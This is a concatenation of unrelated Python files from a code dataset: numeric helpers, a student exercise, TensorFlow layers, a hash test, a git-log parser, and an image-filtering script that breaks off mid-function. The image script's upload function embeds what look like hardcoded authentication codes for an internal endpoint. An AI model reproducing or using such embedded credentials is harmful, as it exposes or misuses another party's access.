np.arccos(edot(v1, v2))\n\nimport scipy.sparse\ndef is_symmetric(m):\n if m.shape[0] != m.shape[1]:\n raise ValueError('m must be a square matrix')\n if not isinstance(m, scipy.sparse.coo_matrix):\n m = scipy.sparse.coo_matrix(m)\n r, c, v = m.row, m.col, m.data\n tril_no_diag = r > c\n triu_no_diag = c > r\n if triu_no_diag.sum() != tril_no_diag.sum():\n return False\n rl = r[tril_no_diag]\n cl = c[tril_no_diag]\n vl = v[tril_no_diag]\n ru = r[triu_no_diag]\n cu = c[triu_no_diag]\n vu = v[triu_no_diag]\n sortl = np.lexsort((cl, rl))\n sortu = np.lexsort((ru, cu))\n vl = vl[sortl]\n vu = vu[sortu]\n check = np.allclose(vl, vu)\n return check\n\nfrom scipy.spatial import Delaunay\ndef in_hull(p, hull):\n \"\"\"\n Test if points in `p` are in `hull`\n\n `p` should be a `NxK` coordinates of `N` points in `K` dimensions\n `hull` is either a scipy.spatial.Delaunay object or the `MxK` array of the \n coordinates of `M` points in `K`dimensions for which Delaunay triangulation\n will be computed\n \"\"\"\n if not isinstance(hull,Delaunay):\n hull = Delaunay(hull)\n return hull.find_simplex(p)>=0\n\ndef gaussian_mle(samples):\n n = len(samples)\n u = samples.mean()\n s = (1.0/n)*((samples-u)**2).sum()\n _ = -(samples-u)**2/(2*s**2)\n return (1.0/(s*np.sqrt(2*np.pi)))*np.exp(_)\n\n# def exponential_mle(samples):\n# l = 1.0/samples.mean()\n# print l\n# return l*np.exp(-l*samples)\n\ndef exponential_mle(samples):\n parms = EXPONENTIAL_DIST.fit(samples)\n return EXPONENTIAL_DIST.pdf(samples, *parms)\n\n\ndef unit_normalize(X):\n Y = X-X.min()\n Z = Y/Y.max()\n return Z\n\nDEFAULT_BETA = 90.0\nDEFAULT_EPS = 1e-5\ndef grady_gauss(X, beta=DEFAULT_BETA, eps=DEFAULT_EPS):\n return np.exp(-(beta*X))+eps\n","sub_path":"cloudlab/math_helpers.py","file_name":"math_helpers.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"217760796","text":"# -*- coding: utf-8 -*-\ndef somaimpares(a):\n soma=0\n for i in range(0,len(a),1):\n if a[i]%2==1:\n soma=soma+a[i]\n print(soma)\nn=int(input('Digite quantidade de elementos: '))\na=[]\nfor i in range(0,n,1):\n valor=int(input('Digite um elemento: '))\n a.append(valor)\n \nprint(somaimpares(a))\n\ndef somapares(b):\n soma=0\n for i in range(0,len(b),1):\n if b[i]%2==0:\n soma=soma+a[i]\n print(soma)\nn=int(input('Digite quantidade de elementos: '))\nb=[]\nfor i in range(0,n,1):\n valor2=int(input('Digite um elemento: '))\n b.append(valor2)\n \ndef cimpares(c):\n cont=0\n for i in range(0,len(c),1):\n if c[i]%2==1:\n cont=cont+1\n return(cont)\nn=int(input('Digite quantidade de elementos: '))\nc=[]\nfor i in range(0,n,1):\n valor3=int(input('Digite um elemento: '))\n c.append(valor3)\n\ndef cpares(d):\n cont=0\n for i in range(0,len(d),1):\n if d[i]%2==0:\n cont=cont+1\n return(cont)\nn=int(input('Digite quantidade de elementos: '))\nd=[]\nfor i in range(0,n,1):\n valor4=(input('Digite um elemento: '))\n d.append(valor4)\n","sub_path":"moodledata/vpl_data/84/usersdata/230/56994/submittedfiles/lista1.py","file_name":"lista1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"388562879","text":"import tensorflow as tf\r\n\r\n\r\ndef variable_summaries(var, name=None):\r\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\r\n with tf.name_scope(name):\r\n with tf.name_scope('summaries'):\r\n mean = tf.reduce_mean(var)\r\n tf.summary.scalar('mean', 
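The `edot` helper in math_helpers.py uses `np.einsum('ij,ij->i', ...)` to compute one dot product per row pair, which is what lets `angles_between_many_unit_vectors` vectorize `arccos` over many unit vectors at once. A small check of that pattern:

```python
import numpy as np

# One dot product per row pair; with unit rows, arccos gives per-pair angles,
# exactly the combination used by angles_between_many_unit_vectors above.
v1 = np.array([[1.0, 0.0], [0.0, 1.0]])
v2 = np.array([[0.0, 1.0], [0.0, 1.0]])
dots = np.einsum('ij,ij->i', v1, v2)
print(dots)             # [0. 1.]
print(np.arccos(dots))  # [1.5707..., 0.] -> 90 degrees and 0 degrees
```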
mean)\r\n with tf.name_scope('stddev'):\r\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\r\n std_summ = tf.summary.scalar('stddev', stddev)\r\n max_summ = tf.summary.scalar('max', tf.reduce_max(var))\r\n min_summ = tf.summary.scalar('min', tf.reduce_min(var))\r\n his_summ = tf.summary.histogram('histogram', var)\r\n\r\n tf.add_to_collection('train_summary', std_summ)\r\n tf.add_to_collection('train_summary', max_summ)\r\n tf.add_to_collection('train_summary', min_summ)\r\n tf.add_to_collection('train_summary', his_summ)\r\n\r\n\r\ndef conv(input,\r\n filter,\r\n strides,\r\n padding,\r\n acti_func=tf.nn.relu,\r\n wd=None,\r\n bias=None,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n # kernel = tf.get_variable('weight',\r\n # shape=filter,\r\n # dtype=tf.float32,\r\n # initializer=tf.truncated_normal_initializer(stddev=0.1))\r\n kernel = tf.Variable(initial_value=tf.truncated_normal(filter, stddev=0.1), name='weight')\r\n variable_summaries(kernel, 'weight')\r\n\r\n if wd is not None:\r\n weight_decay = tf.multiply(tf.nn.l2_loss(kernel), wd, name='weight_loss')\r\n tf.add_to_collection('losses', weight_decay)\r\n\r\n if bias is not None:\r\n # bias = tf.get_variable('bias',\r\n # filter[-1],\r\n # dtype=tf.float32,\r\n # initializer=tf.constant_initializer(bias))\r\n bias = tf.Variable(tf.constant(bias, shape=[filter[-1]]), name='bias')\r\n variable_summaries(bias, 'bias')\r\n\r\n convolution = tf.nn.conv2d(input, kernel, strides=strides, padding=padding)\r\n act = acti_func(convolution + bias, name='activation')\r\n his_summ = tf.summary.histogram('activations', act)\r\n tf.add_to_collection('train_summary', his_summ)\r\n return act\r\n\r\n\r\ndef pool(input,\r\n ksize=[1, 1, 3, 1],\r\n strides=[1, 1, 3, 1],\r\n padding='SAME',\r\n pool_func=tf.nn.max_pool,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n return pool_func(input, ksize=ksize, strides=strides, padding=padding, name=name)\r\n\r\n\r\ndef unfold(input, name=None):\r\n with tf.variable_scope(name) as scope:\r\n input = tf.reduce_mean(input,1)\r\n num_batch, width, num_channels = input.get_shape()\r\n #num_batch, height, width, num_channels = input.get_shape()\r\n output = tf.reshape(input, [-1, num_channels])\r\n return output\r\n\r\n\r\ndef fc(input,\r\n output_dim,\r\n input_dim=None,\r\n acti_func=tf.nn.relu,\r\n wd=None,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n # input_dim = tf.shape(input)[1]\r\n if input_dim is None:\r\n num_batch, input_dim = input.get_shape()\r\n input_dim = input_dim.value\r\n weights = tf.get_variable('weight',\r\n shape=[input_dim, output_dim],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1))\r\n # weights = tf.Variable(tf.truncated_normal(shape=[input_dim.value, output_dim], stddev=0.1), name='weight')\r\n variable_summaries(weights, 'weight')\r\n if wd is not None:\r\n weight_decay = tf.multiply(tf.nn.l2_loss(weights), wd, name='weight_loss')\r\n tf.add_to_collection('losses', weight_decay)\r\n\r\n bias = tf.get_variable('bias',\r\n output_dim,\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.0))\r\n # bias = tf.Variable(tf.constant(0.0, shape=[output_dim]), name='bias')\r\n variable_summaries(bias, 'bias')\r\n output = tf.matmul(input, weights) + bias\r\n output = acti_func(output)\r\n his_summ = tf.summary.histogram('activations', output)\r\n tf.add_to_collection('train_summary', his_summ)\r\n return 
output\r\n\r\n","sub_path":"CNNDetector/tflib/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466661662","text":"\"\"\"Assignment 01: Hash Functions.\n\nECE 590: Natural Language Processing\nPatrick Wang\n\"\"\"\n\nimport random\nimport numpy as np\n\nfrom hw01_solution import to_str_invertible, to_int_invertible, to_int_uniform, to_int_nonuniform\n\n\nNUM_CODE_POINTS = int('0x110000', 16)\n\n\ndef random_unicode(num_chars):\n \"\"\"Generate a random Unicode character.\"\"\"\n return ''.join([chr(random.randrange(NUM_CODE_POINTS)) for _ in range(num_chars)])\n\n\ndef test_uniform():\n \"\"\"Test to_int_uniform() function.\"\"\"\n # generate random unicode strings\n strings = [random_unicode(4) for _ in range(1000)]\n # has strings to ints\n values = [to_int_uniform(string) for string in strings]\n print('\\nShould be close to 500:')\n print(sum(values))\n\n\ndef test_nonuniform():\n \"\"\"Test to_int_nonuniform() function.\"\"\"\n # generate random unicode strings\n strings = [random_unicode(4) for _ in range(1000)]\n # hash strings to integers\n values = [to_int_nonuniform(string) for string in strings]\n # compute histogram of integers\n hist, _ = np.histogram(values, bins=100, range=(0, 100))\n print('\\nShould be nonuniform:')\n print(hist)\n\n\ndef test_invertible():\n \"\"\"Test to_int_invertible() and to_str_invertible() functions.\"\"\"\n # hash string to integer\n value = to_int_invertible('hello')\n # un-hash integer back to string\n string = to_str_invertible(value)\n print('\\nShould say \"hello\":')\n print(string)\n\n\nif __name__ == \"__main__\":\n test_uniform()\n test_nonuniform()\n test_invertible()\n","sub_path":"hw01_evaluate.py","file_name":"hw01_evaluate.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"229974921","text":"import re\nimport subprocess\nfrom datetime import datetime\nfrom collections import Counter\n\nimport sys\nfrom Utils import util\n\nproject_name_list = [\"your project here (lower case)\"]\nproject_name_dict_for_issue_display = {\"avro\": \"AVRO\",\n \"zookeeper\": \"ZOOKEEPER\", \"tez\": \"TEZ\",\n \"chukwa\": \"CHUKWA\", \"knox\": \"KNOX\"}\n\ndef initialize_dict(dic):\n dic['issue_id'] = set()\n dic['author_date'] = None\n dic['commit_date'] = None\n\ndef match_basic_regexp(text, regexp):\n match = re.match(regexp, text)\n info = None\n if match:\n info = match.group(1)\n return info\n\ndef match_issue_regexp(text, regexp_msg, regexp_issue):\n match_msg = re.match(regexp_msg, text)\n issue_ids=[]\n if match_msg:\n issue_ids = re.findall(regexp_issue, match_msg.group(1))\n #if len(issue_ids)==0:\n # issue_ids=[]\n\n return issue_ids\n\ndef extract_datetime_from_string(target):\n return datetime.strptime(target, \"%a %b %d %H:%M:%S %Y %z\")\n\ndef insert_basicdate_info(text, regexp, dic, key):\n data = match_basic_regexp(text, regexp)\n if data:\n dic[key] = extract_datetime_from_string(data)\n\ndef parse_log(log, p_name):\n \"\"\"\n Returns:\n return_dict [dict>] -- key name list: author_date, commit_date, issue_id\n \"\"\"\n re_commit = r'^commit ([0-9a-f]{5,40})$'\n re_authordate = r'^AuthorDate:\\s+(.*)$'\n re_commitdate = r'^CommitDate:\\s+(.*)$'\n re_msg = r'^\\s+(.*)$'\n re_issue_id = r'{0}-[0-9]*'.format(project_name_dict_for_issue_display[p_name])\n\n return_dict = {}\n cur_commit_hash = None\n for row in 
log.splitlines():\n #for regexp in re_list:\n # info = match_basic_regexp(row, regexp)\n commit_hash = match_basic_regexp(row, re_commit)\n if commit_hash:\n cur_commit_hash = commit_hash\n if not commit_hash in return_dict:\n return_dict[commit_hash] = {}\n initialize_dict(return_dict[commit_hash])\n\n insert_basicdate_info(row, re_authordate, return_dict[cur_commit_hash], 'author_date')\n insert_basicdate_info(row, re_commitdate, return_dict[cur_commit_hash], 'commit_date')\n\n issue_ids = match_issue_regexp(row, re_msg, re_issue_id)\n for issue_id in issue_ids:\n return_dict[cur_commit_hash]['issue_id'].add(issue_id)\n\n return return_dict\n\n\ndef count_issue(parsed_log_dict, p_name):\n issue_id_list = []\n for commit_hash in parsed_log_dict.keys():\n for issue_id in parsed_log_dict[commit_hash]['issue_id']:\n issue_id_list.append(issue_id)\n\n issue_id_set = set(issue_id_list)\n print(\"number of issue: {0}\".format(len(issue_id_list)))\n print(\"number of unique issue: {0}\".format(len(issue_id_set)))\n #print(\"Count issue:\")\n #cnt = Counter(issue_id_list)\n #print(cnt)\n\n all_target_issue_set = set(util.load_pickle(\"./issues_list/{0}_issue_list.pickle\".format(project_name_dict_for_issue_display[p_name])))\n print(\"number of all target issues: {0}\".format(len(all_target_issue_set)))\n diff_all2log = len(all_target_issue_set - issue_id_set)\n print(\"proportion of detected issues by log message (all - log): {0}({1:,}/{2:,})\".format(round(1-(diff_all2log/len(all_target_issue_set)), 3), len(all_target_issue_set) - diff_all2log, len(all_target_issue_set)))\n \ndef git_log_all(dirname):\n log = subprocess.check_output(\n ['git', '-C', '{}'.format(dirname), 'log', '--all', '--pretty=fuller'],\n universal_newlines=True\n )\n return log\n\n\ndef process_log(p_name):\n log = git_log_all(\"./../repository/{0}\".format(p_name))\n #print(log)\n\n parsed_log_dict = parse_log(log, p_name)\n util.dump_pickle(\"./data_{0}/{1}_log_message_info.pickle\".format(project_name_dict_for_issue_display[p_name], p_name), parsed_log_dict)\n count_issue(parsed_log_dict, p_name)\n\ndef main():\n for p_name in project_name_list:\n process_log(p_name)\n\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"prepare_data/extract_issues/check_all_log_repository.py","file_name":"check_all_log_repository.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"418688261","text":"# -*- coding: utf-8 -*-\r\n# @Time : 1/26/18 11:15 AM\r\n# @Author : Zhu Junwei\r\n\r\n# import sys\r\n# sys.path.append('.')\r\n\r\nimport os\r\nimport requests\r\nimport multi_task_resnet\r\nimport torch\r\nimport transforms\r\nfrom torch.autograd import Variable\r\nfrom torch.nn import functional\r\nfrom PIL import Image\r\nimport pic_similarity\r\nimport shutil\r\nimport logging\r\nimport collections\r\nimport numpy as np\r\nimport hashlib\r\ntry:\r\n import cv2\r\nexcept:\r\n import cv2\r\n\r\n_FILE_SLIM=100*1024*1024\r\ndef File_md5(filename):\r\n calltimes = 0 #分片的个数\r\n hmd5 = hashlib.md5()\r\n fp = open(filename, \"rb\")\r\n f_size = os.stat(filename).st_size #得到文件的大小\r\n if f_size > _FILE_SLIM:\r\n while (f_size > _FILE_SLIM):\r\n hmd5.update(fp.read(_FILE_SLIM))\r\n f_size /= _FILE_SLIM\r\n calltimes += 1 # delete #文件大于100M时进行分片处理\r\n if (f_size > 0) and (f_size <= _FILE_SLIM):\r\n hmd5.update(fp.read())\r\n else:\r\n hmd5.update(fp.read())\r\n return (hmd5.hexdigest(), calltimes)\r\n\r\ndata_transform = transforms.Compose([\r\n 
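`File_md5` in pic_filter_v2.py hashes large files in 100 MB slices but tracks the remaining size by hand, dividing `f_size` inside the loop. A hedged, simpler streaming alternative that produces the same digest without any size bookkeeping (offered as a sketch, not a drop-in replacement for the tuple-returning original):

```python
import hashlib

def file_md5(filename, chunk=100 * 1024 * 1024):
    # iter(..., b"") keeps reading fixed-size blocks until EOF returns b"".
    h = hashlib.md5()
    with open(filename, "rb") as fp:
        for block in iter(lambda: fp.read(chunk), b""):
            h.update(block)
    return h.hexdigest()
```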
transforms.Resize((320, 320)),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ])\r\nheaders = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Proxy-Connection\": \"keep-alive\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\r\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n # 'Connection': 'close',\r\n}\r\n\r\ndef imresize(src, height):\r\n ratio = src.shape[0] * 1.0 / height\r\n width = int(src.shape[1] * 1.0 / ratio)\r\n return cv2.resize(src, (width, height))\r\n\r\n#获取图像背景平均亮度及前景粗略轮廓\r\ndef get_mainitem_mask_rough(im):\r\n \"\"\"\r\n :param im:\r\n :return: 背景平均亮度,前景mask\r\n \"\"\"\r\n # 检查背景\r\n gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\r\n gray400 = imresize(gray, 400)\r\n # 边缘锐化\r\n kenerl3x3 = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\r\n gray400 = cv2.filter2D(gray400, cv2.CV_8UC1, kenerl3x3)\r\n canny400 = cv2.Canny(gray400, 20, 50)\r\n canny400 = np.where(canny400 == 255, 1, 0).astype('uint8')\r\n\r\n kernel7 = cv2.getStructuringElement(cv2.MORPH_RECT, (7, 7))\r\n canny400 = cv2.morphologyEx(canny400, cv2.MORPH_CLOSE, kernel7)\r\n image, contours, hierarchy = cv2.findContours(canny400, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n # cv2.drawContours(image,contours,-1,(255,255,255))\r\n # cv2.imshow('canny',image)\r\n # cv2.waitKey(0)\r\n # 获取前景mask\r\n for contour in contours:\r\n newcontour = contour.reshape(contour.shape[0], contour.shape[2])\r\n cv2.fillPoly(canny400, [newcontour], (1, 1, 1))\r\n # cv2.imshow('canny300',canny300*255)\r\n # cv2.waitKey(0)\r\n kernel9 = cv2.getStructuringElement(cv2.MORPH_RECT, (9, 9))\r\n canny400 = cv2.dilate(canny400,kernel9)\r\n bg400 = np.where(canny400 == 0, gray400, 0).astype('uint8')\r\n bgArea = np.where(canny400 == 0, 1, 0).sum()\r\n\r\n # # bgr三通道的均值\r\n # im300 = imresize(im,300)\r\n # averageB = round(np.where(canny300 == 0, im300[:, :, 0], 0).sum() / (bgArea + 0.0001))\r\n # averageG = round(np.where(canny300 == 0, im300[:, :, 1], 0).sum() / (bgArea + 0.0001))\r\n # averageR = round(np.where(canny300 == 0, im300[:, :, 2], 0).sum() / (bgArea + 0.0001))\r\n # print(averageB, averageG, averageR)\r\n\r\n # 背景平均亮度\r\n aveBg = 0\r\n if (bgArea*10>canny400.shape[0]*canny400.shape[1]) or (bgArea*20>canny400.shape[0]*canny400.shape[1] and len(contours)==2):\r\n aveBg = round(bg400.sum() / bgArea)\r\n cannyorg = imresize(canny400,im.shape[0])\r\n # image, contours, hierarchy = cv2.findContours(cannyorg, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n # cv2.imshow('2',cannyorg*255)\r\n # cv2.waitKey(0)\r\n return aveBg,cannyorg,gray\r\n\r\n#判断目标是否触边不完整(默认白色背景下)\r\ndef iscomplete(gray):\r\n bcomplete = True\r\n if np.where(gray[1]>253,0,1).sum()*10>gray.shape[1] or np.where(gray[0]>253,0,1).sum()*10>gray.shape[1]:\r\n bcomplete = False\r\n if np.where(gray[gray.shape[0]-2]>253,0,1).sum()*10>gray.shape[1] or np.where(gray[gray.shape[0]-1]>253,0,1).sum()*10>gray.shape[1]:\r\n bcomplete = False\r\n if np.where(gray[:,1]>253,0,1).sum()*10>gray.shape[0] or np.where(gray[:,0]>253,0,1).sum()*10>gray.shape[0]:\r\n bcomplete = False\r\n if np.where(gray[:,gray.shape[1]-2]>253,0,1).sum()*10>gray.shape[0] or np.where(gray[:,gray.shape[1]-1]>253,0,1).sum()*10>gray.shape[0]:\r\n bcomplete = False\r\n return bcomplete\r\n\r\n#修正图像,只对白底图片有效\r\ndef modify_pic(skupath, im_path):\r\n \"\"\"\r\n\r\n :param skupath:\r\n :param 
im_path:\r\n :return: modified_im_path\r\n \"\"\"\r\n modified_im_path = ''\r\n respath = os.path.join(skupath,'modified/')\r\n if os.path.exists(respath) == False:\r\n os.makedirs(respath)\r\n maxratio = 0.85\r\n pil_imag = Image.open(im_path)\r\n bestpic = cv2.cvtColor(np.asarray(pil_imag.convert('RGB')), cv2.COLOR_RGB2BGR)\r\n\r\n # bestpic = cv2.imread(im_path)\r\n # if bestpic.empty():\r\n # return im_path\r\n bg0, mask0, gray0 = get_mainitem_mask_rough(bestpic)\r\n\r\n #白色背景并且主体完整才会进行修正\r\n if bg0 > 253: #and iscomplete(gray0):\r\n #补充前景区域\r\n mask_fg = np.where(gray0 > 253, mask0, 1).astype('uint8')\r\n image, fgcontours, hierarchy = cv2.findContours(mask_fg, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n #如果商品主体在画面内不完整,则不修正\r\n if len(fgcontours) == 1 and iscomplete(gray0) == False:\r\n modified_im_path = im_path\r\n elif len(fgcontours) == 1:\r\n itemrect = cv2.boundingRect(fgcontours[0])\r\n\r\n # 判断商品位置及大小是否合理\r\n itemarea = itemrect[2] * itemrect[3]\r\n imarea = mask0.shape[0] * mask0.shape[1]\r\n ratio = itemarea / imarea\r\n\r\n # 修正主图,商品居中,最长边不能超过画面的90%\r\n if itemrect[2] > itemrect[3]:\r\n scale = bestpic.shape[1] * maxratio / itemrect[2]\r\n else:\r\n scale = bestpic.shape[0] * maxratio / itemrect[3]\r\n\r\n if scale >= 1 and ratio > 0.5 and ratio < 0.8:\r\n modified_im_path = im_path\r\n else:\r\n # 修正主图\r\n crop = bestpic[itemrect[1]:itemrect[1] + itemrect[3], itemrect[0]:itemrect[0] + itemrect[2]]\r\n dst = cv2.resize(crop, (int(crop.shape[1] * scale), int(crop.shape[0] * scale)))\r\n # cv2.imshow('11111',dst)\r\n # cv2.waitKey(0)\r\n bottom = int((bestpic.shape[0] - dst.shape[0]) / 2)\r\n right = int((bestpic.shape[1] - dst.shape[1]) / 2)\r\n top = (bestpic.shape[0] - dst.shape[0]) - bottom\r\n left = (bestpic.shape[1] - dst.shape[1]) - right\r\n dst = cv2.copyMakeBorder(dst, top, bottom, left, right, cv2.BORDER_CONSTANT,\r\n value=(bg0, bg0, bg0))\r\n newfile = respath + im_path[im_path.rfind('/') + 1:]\r\n cv2.imwrite(newfile, dst)\r\n modified_im_path = newfile\r\n elif len(fgcontours) > 1:\r\n rects = []\r\n pic_area = bestpic.shape[0] * bestpic.shape[1]\r\n for contour in fgcontours:\r\n boundingbox = cv2.boundingRect(contour)\r\n center_x = (boundingbox[0] + boundingbox[2]) / 2\r\n center_y = (boundingbox[1] + boundingbox[3]) / 2\r\n # 对于不足画面1/6并且在画面四周的区域当作背景处理\r\n if cv2.contourArea(contour, False) * 6 < pic_area and (\r\n center_x * 3 < bestpic.shape[1] or center_y * 3 < bestpic.shape[0] or center_x * 3 >\r\n bestpic.shape[1] * 2 or center_y * 3 < bestpic.shape[0] * 2):\r\n newcontour = contour.reshape(contour.shape[0], contour.shape[2])\r\n cv2.fillPoly(bestpic, [newcontour], (bg0, bg0, bg0)) # logo或者小物件,标记为背景\r\n else:\r\n rects.append(boundingbox)\r\n if len(rects) > 0:\r\n x1 = bestpic.shape[1]\r\n y1 = bestpic.shape[0]\r\n x2 = 0\r\n y2 = 0\r\n for rect in rects:\r\n if rect[0] < x1:\r\n x1 = rect[0]\r\n if rect[1] < y1:\r\n y1 = rect[1]\r\n if rect[0] + rect[2] > x2:\r\n x2 = rect[0] + rect[2]\r\n if rect[1] + rect[3] > y2:\r\n y2 = rect[1] + rect[3]\r\n itemrect = [x1, y1, x2 - x1, y2 - y1]\r\n\r\n # 判断商品位置及大小是否合理\r\n itemarea = itemrect[2] * itemrect[3]\r\n imarea = bestpic.shape[0] * bestpic.shape[1]\r\n\r\n # 修正主图,商品居中,最长边不能超过画面的90%\r\n if itemrect[2] > itemrect[3]:\r\n scale = bestpic.shape[1] * maxratio / itemrect[2]\r\n else:\r\n scale = bestpic.shape[0] * maxratio / itemrect[3]\r\n\r\n if iscomplete(gray0) == False:\r\n dst = bestpic\r\n else:\r\n # 修正主图\r\n crop = bestpic[itemrect[1]:itemrect[1] + itemrect[3], itemrect[0]:itemrect[0] + 
itemrect[2]]\r\n # print('scale ,bestpic.shape, crop.shape, itemrect',scale ,bestpic.shape, crop.shape, itemrect)\r\n # print(int(crop.shape[1] * scale), int(crop.shape[0] * scale))\r\n dst = cv2.resize(crop, (int(crop.shape[1] * scale), int(crop.shape[0] * scale)))\r\n # cv2.imshow('11111',dst)\r\n # cv2.waitKey(0)\r\n bottom = int((bestpic.shape[0] - dst.shape[0]) / 2)\r\n right = int((bestpic.shape[1] - dst.shape[1]) / 2)\r\n top = (bestpic.shape[0] - dst.shape[0]) - bottom\r\n left = (bestpic.shape[1] - dst.shape[1]) - right\r\n dst = cv2.copyMakeBorder(dst, top, bottom, left, right, cv2.BORDER_CONSTANT,\r\n value=(bg0, bg0, bg0))\r\n newfile = respath + im_path[im_path.rfind('/') + 1:]\r\n cv2.imwrite(newfile, dst)\r\n modified_im_path = newfile\r\n else:\r\n modified_im_path = im_path\r\n else:\r\n modified_im_path = im_path\r\n return modified_im_path\r\n\r\n#下载图像,默认20s超时\r\ndef download_image(image_url, file_path, timeout=20):\r\n\r\n response = None\r\n try_times = 0\r\n while True:\r\n try:\r\n try_times += 1\r\n response = requests.get(image_url, headers=headers, timeout=timeout)\r\n # print(file_path)\r\n with open(file_path, 'wb') as f:\r\n f.write(response.content)\r\n response.close()\r\n break\r\n\r\n except Exception as e:\r\n if try_times < 2:\r\n continue\r\n if response:\r\n response.close()\r\n print(\"## Fail: {} {}\".format(image_url, e.args))\r\n break\r\n\r\n\r\n# 下载图片到本地缓存\r\ndef downloadimgs(skupath, urllist):\r\n \"\"\"\r\n\r\n :param skupath:对应的缓存目录\r\n :param urllist:\r\n :return:{localpath1:url1,localpath2:url2,localpath3:url3...}\r\n \"\"\"\r\n #800x800\r\n # prefix = 'http://img14.360buyimg.com/n12/'\r\n prefix = 'http://img13.360buyimg.com/n12/'\r\n #350x350\r\n # prefix = 'http://img14.360buyimg.com/n1/'\r\n reslist = collections.OrderedDict()\r\n\r\n if os.path.exists(skupath) == False:\r\n os.makedirs(skupath)\r\n for urlinfo in urllist:\r\n file_name = urlinfo[urlinfo.rfind('/') + 1:]\r\n filepath = os.path.join(skupath, file_name)\r\n filepath = filepath.replace('\\\\', '/')\r\n if os.path.exists(filepath) == False:\r\n try:\r\n # print('downloading ', prefix+urlinfo)\r\n # request.urlretrieve((prefix+urlinfo), filepath)\r\n # print(file_name)\r\n download_image((prefix+urlinfo), filepath)\r\n reslist[filepath] = urlinfo\r\n\r\n except:\r\n print('download image failed!url:', urlinfo)\r\n else:\r\n reslist[filepath] = urlinfo\r\n\r\n return reslist\r\n\r\ndef uploadImage(localPath):\r\n print (\"local path: %s\" % localPath)\r\n url='http://upload.erp.360buyimg.local/imageUpload.action'\r\n headers={'aucode': 'f2424b3a07a5604f0209416035a4923a', 'type':'0', 'keycode':'860f79451387081_'}\r\n f=open(localPath,'rb')\r\n data=f.read()\r\n r = requests.post(url, data=data, headers=headers)\r\n return r.json()[0]['msg']\r\n\r\n\r\ndef evaluate_pic(skupath, im_path, model, use_gpu):\r\n res_path = ''\r\n pic_type = -1\r\n bg_color = 'unknown'\r\n try:\r\n img = Image.open(im_path)\r\n image = img.convert('RGB')\r\n image = data_transform(image)\r\n except Exception as e:\r\n print(im_path)\r\n print(e)\r\n return bg_color, pic_type, res_path\r\n #如果宽高异常,直接退出\r\n width, height = img.size\r\n if abs(width-height) > 20:\r\n return bg_color, pic_type, res_path\r\n \r\n image = Variable(image.unsqueeze(0), volatile=True)\r\n if use_gpu:\r\n image = image.cuda()\r\n\r\n #主体分,背景白色概率,有logo概率,有文字概率,有二维码概率\r\n res1,res2,res3,res4,res5 = model(image)\r\n score1 = functional.softmax(res1, dim=1).data[0][1]\r\n score2 = functional.softmax(res2, dim=1).data[0][0]\r\n 
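`evaluate_pic` scores each image with five classification heads and reads the positive-class probability out of each softmax. A toy version of that per-head scoring, with a fabricated logit pair standing in for one head's output:

```python
import torch
from torch.nn import functional

# Hypothetical 2-class logits from one head, for a single image.
logits = torch.tensor([[0.2, 2.3]])
probs = functional.softmax(logits, dim=1)
positive_score = probs.data[0][1]        # prob of the positive class, as above
print(float(positive_score) > 0.8)       # thresholded like score1 in evaluate_pic
```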
score3 = functional.softmax(res3, dim=1).data[0][1]\r\n score4 = functional.softmax(res4, dim=1).data[0][1]\r\n score5 = functional.softmax(res5, dim=1).data[0][1]\r\n score1_0 = score1\r\n if score2 > 0.6:\r\n bg_color = 'white'\r\n elif score2 < 0.4:\r\n bg_color = 'color'\r\n\r\n # if the background is white, run the image fix-up\r\n if score2 > 0.8:\r\n # if the subject is poor but there is no logo, text or watermark clutter, it can be used directly as a sub-image, no fix needed\r\n if score1_0 < 0.6 and score3 < 0.3 and score4 < 0.2 and score5 < 0.2:\r\n modified_path = im_path\r\n else:\r\n try:\r\n modified_path = modify_pic(skupath, im_path)\r\n except Exception as e:\r\n print('modify image failed!', im_path)\r\n # print(e)\r\n logging.exception(e)\r\n modified_path = im_path\r\n\r\n if len(modified_path) > 0 and modified_path != im_path:\r\n try:\r\n img2 = Image.open(modified_path)\r\n image2 = img2.convert('RGB')\r\n image2 = data_transform(image2)\r\n image2 = Variable(image2.unsqueeze(0), volatile=True)\r\n if use_gpu:\r\n image2 = image2.cuda()\r\n # subject score, white-background prob., logo prob., text prob., QR-code prob.\r\n res1, res2, res3, res4, res5 = model(image2)\r\n score1 = functional.softmax(res1, dim=1).data[0][1]\r\n score3 = functional.softmax(res3, dim=1).data[0][1]\r\n score4 = functional.softmax(res4, dim=1).data[0][1]\r\n score5 = functional.softmax(res5, dim=1).data[0][1]\r\n except Exception as e:\r\n 